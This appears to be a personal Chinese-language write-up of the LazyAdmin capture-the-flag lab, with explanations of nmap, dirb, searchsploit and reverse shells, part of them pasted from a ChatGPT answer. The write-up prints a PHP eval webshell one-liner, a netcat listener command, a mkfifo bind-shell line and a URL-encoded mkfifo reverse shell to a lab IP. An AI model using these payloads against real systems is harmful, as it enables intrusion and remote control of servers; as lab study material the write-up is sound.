LazyAdmin打靶笔记

参考视频：https://www.bilibili.com/video/BV16Tc8eCEKZ/?spm_id_from=333.1387.homepage.video_card.click

Nmap的-F参数用于快速扫描目标主机上开放的端口。它会限制扫描的端口范围，只扫描常见的1000个端口，而不是扫描所有的65535个端口。这样可以加快扫描速度，尤其是在进行初步评估时非常有用。

可以看到端口只有一个ssh口和web口

在浏览器输入ip查看内容：

是一个apache的默认页面，可以看网站源码里面有没有隐藏的信息，按ctrl+u

似乎没有，试试目录扫描，看有没有隐藏的文件：

dirb http://10.10.114.252看到index.php，尝试发现10.10.176.206/content/as/index.php可以打开（这个ip是重新创建的实例）

CMS（Content Management System，内容管理系统）是一种用于创建、管理和修改数字内容的软件工具或平台。它使用户可以轻松地创建和编辑网站上的内容，而不需要深入的编程知识。通常，CMS允许用户通过图形界面进行操作，而不需要直接操作HTML、CSS或其他编程语言。

通过searchsploit查找该CMS有没有已知漏洞

不知道版本是否能对上，可以先看一看

通过-m可以把我们所需的漏洞信息导入到自己的目录下面

with session() as r: 是 Python 中一种使用上下文管理器（context manager）的语法，通常在处理需要自动管理资源的场景中使用。在这个例子中，session()通常是一个会话对象（例如来自 requests 或 SQLAlchemy 库），并且通过 with 语句块来确保会话的资源被正确管理，自动进行清理和关闭。

语法解释：

with 语句：它会自动管理上下文，保证在代码块执行前后做一些操作（如打开和关闭文件、数据库连接等）。

session()：通常是创建一个会话对象，它用于发起网络请求、数据库连接等操作。在一些库中，如 requests（用于网络请求）或者 SQLAlchemy（用于数据库操作），session() 用来管理连接的生命周期。

as r：表示将会话对象 session() 赋值给变量 r，你可以通过 r 来操作会话对象。

分析这段脚本，看来是要在登录成功后进行文件上传，漏洞原理是未对扩展名做出限制

危险文件示例：

Webshell（.php5）：服务器配置可能允许.php5扩展名执行PHP代码。

.htaccess：可修改Apache配置，将其他扩展名（如.jpg）解析为PHP，绕过后续检测。

用另外一个漏洞获取管理员密码，这里是备份文件泄露

上面写可以在指定路径下载所有的数据库文件

目录的位置可以一级一级往上尝试

最后得到：

我们尝试对这串密码进行解密：使用crackstation工具

然后我们登录进去，文件可知管理员账号是manager

根据直接之前的文件上传漏洞脚本可知，漏洞点在media-center

创建一个木马文件去尝试拿到webshell进行操作

这里木马用的是：

<?=@eval($_GET[1]);?>

这里注意上传之后测试的路径，可以直接右键上传的文件点击openlink,这样就不用试了

之前没有接触过，我想知道 whoami有什么用，怎么查看自己当前的权限呢？

如果返回的是 www-data（通常是Web服务器的用户），这意味着你正在以Web服务器的权限执行命令，这通常是有限制的，无法进行一些管理操作。

如果返回的是管理员或root权限的用户名（如 root 或 Administrator），则说明你可能已获得较高权限，可能存在安全风险。

所以现在要提升权限

为了提升权限，需要反弹一下shell

现在的我对反弹shell一无所知

关于提权，请看我另外一篇笔记https://www.cnblogs.com/Ex1st/p/18744687/reverse_shell 《提权（先谈reverse反弹）》

反弹shell(这些另外一篇笔记写了）链接

问：我现在正在进行一个测试，目前已经利用木马上传文件漏洞拿到了shell，通过whoami命令查到现在是www-data,老师告诉我要反弹shell，但是我之前没有了解过，请你结合提权中反弹shell的过程和目的详细的介绍和解释

1、首先为什么反弹shell有助于提权？

答：可能当前的shell是受限的，或者非交互式的，无法执行提权操作。通过反弹获得更完整的shell环境，比如使用python的pyt模块生成交互式终端

2、什么是反弹shell

反弹Shell是一种常见的渗透技术，允许攻击者在目标计算机上执行远程命令。通过让目标计算机主动连接到攻击者的计算机，攻击者可以绕过目标机器的防火墙或入站限制。防护措施包括加强防火墙规则、使用IDS/IPS、以及限制用户权限等。

3、hack-tools的使用

rlwrap nc -lvnp 5555

ChatGPT 说：

命令 rlwrap nc -lvnp 5555 结合了 rlwrap 和 nc（Netcat）工具，目的是为 Netcat 提供更好的命令行编辑体验。具体来说，这个命令会启动 Netcat 监听端口 5555，等待反向连接，并为该命令提供 GNU Readline 的功能，以便可以使用命令历史、自动补全等功能。

解释各个部分：

**rlwrap**：**rlwrap** 中：

rlwrap 是一个提供 GNU Readline 功能的工具，它为没有行编辑功能的命令行工具（如 nc）提供命令历史记录、补全和其他编辑功能。

通过 rlwrap，你可以在 Netcat 中使用 ↑ 和 ↓ 键浏览命令历史，使用 Tab 键补全文件路径等。

**nc**（Netcat）：**nc**（Netcat）的：

nc（Netcat）是一个强大的网络工具，用于建立TCP或UDP连接。它常用于网络调试、监听端口、发送数据或创建反向Shell。

在这个命令中，nc 用来在本地监听端口 5555。

**-l**：

-l 选项使 Netcat 进入监听模式，等待外部的连接。

**-v**：

-v 选项启用详细模式，显示更多的连接信息。

**-n**：

-n 禁止进行DNS解析，直接使用IP地址。这意味着Netcat不会将连接的主机名解析为域名，而是直接使用IP地址。

**-p 5555**：**-第 5555 页**：

-p 选项指定 Netcat 要监听的端口号，此处是端口 5555。

`nc mkfifo` 的作用

在网络安全（如反弹Shell）中，攻击者可以利用 mkfifo 创建一个命名管道，并让 Netcat 通过该管道进行远程命令执行。例如：

mkfifo /tmp/f; nc -lvp 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1

解释各个部分：

mkfifo /tmp/f
- 在 /tmp/ 目录下创建一个命名管道 f。
nc -lvp 4444 < /tmp/f
- 启动 Netcat，监听端口 4444，等待连接，并将输入数据重定向到 /tmp/f。
| /bin/sh > /tmp/f 2>&1
- 通过 |（管道）让 /bin/sh 读取 /tmp/f 的数据，并将输出（标准输出 + 标准错误）写回到 /tmp/f。
- 这样，Netcat 接收到的数据会被 sh 解释为命令，而 sh 的执行结果会通过 Netcat 发送回去。

`mkfifo` 介绍

mkfifo 是 Linux 下的一个命令，用于创建 FIFO（命名管道） 文件，它的作用是让多个进程可以通过这个管道进行通信。FIFO 的特点是：

数据是 单向流动 的（类似于 | 管道）。
进程 A 写入数据到 FIFO 文件，进程 B 读取数据。
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.176.206%205555%20%3E%2Ftmp%2Ff

操作：